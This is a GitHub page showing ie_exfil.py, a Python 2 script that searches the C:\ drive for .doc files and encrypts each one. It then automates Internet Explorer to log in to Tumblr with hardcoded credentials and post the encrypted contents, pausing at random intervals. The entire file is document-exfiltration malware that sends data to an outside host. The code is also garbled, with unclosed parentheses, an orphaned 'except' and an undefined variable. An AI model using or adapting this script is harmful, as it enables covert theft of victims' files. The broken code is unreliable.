-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathie_exfil.py
176 lines (120 loc) · 3.94 KB
/
ie_exfil.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
#!/usr/bin/env python
__author__ = 'kalcho'
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
doc_type = ".doc"
username = "[email protected]"
password = "justinBHP2014"
public_key = ""
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
def encrypt_string(plaintext):
chunk_size = 256
print "Compressing: %d bytes" % len(plaintext
plaintext = zlib.compress(plaintext)
print "Encrypting %d bytes" % len(plaintext)
rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey
encrypted = ""
offset = 0
while offset < len(plaintext):
chunk = plaintext[offset:offset+chunk_size]
if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk))
encrypted += rsakey.encrypt(chunk)
offset += chunk_size
encrypted = encrypted.encode("base64")
print "Base64 encoded crypto: %d" % len(encrypted)
return encrypted
def encrypt_post(filename):
# open and read the file
fd = open(filename, "rb")
contents = fd.read()
fd.close()
encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents)
return encrypted_title, encrypted_body
def random_sleep():
time.sleep(random.randint(5, 10))
return
def login_to_tumblr(ie):
# retrieve all elements in the document
full_doc = ie.Document.all
# iterate looking for the login form
for i in full_doc:
if i.id == "signup_email":
i.setAttribute("value", username)
elif i.id == "signup_password":
i.setAttribute("value", password)
random_sleep()
# you can be presented with different home pages
if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass
random_sleep()
# the login form is the second form on the page
wait_for_browser(ie)
return
def post_to_tumblr(ie, title, post):
full_doc = ie.Document.all
for i in full_doc:
if i.id == "post_one":
i.setAttribute("value", title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML", post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus()
# move focus away from the main content box
random_sleep()
title_box.focus()
random_sleep()
# post the form
post_form.children[0].click()
wait_for_browser(ie)
random_sleep()
return
def exfiltrate(document_path):
ie = win32com.client.Dispatch("InternetExplorer.Application")
ie.Visible = 1
# head to tumblr and login
ie.Navigate("http://www.tumblr.com/login")
wait_for_browser(ie)
print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating"
ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie)
# encrypt the file
title, body = encrypt_post(document_path)
print "Creating new post..."
post_to_tumblr(ie, title, body)
print "Posted!"
# destroy the IE instance
ie.Quit()
ie = None
return
# main loop for document discovery
# NOTE: no tab for for first line of code below
for parent, directories, filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames, "*%s" % doc_type):
print "Found: %s" % document_path
exfiltrate(document_path)
raw_input("Continue?")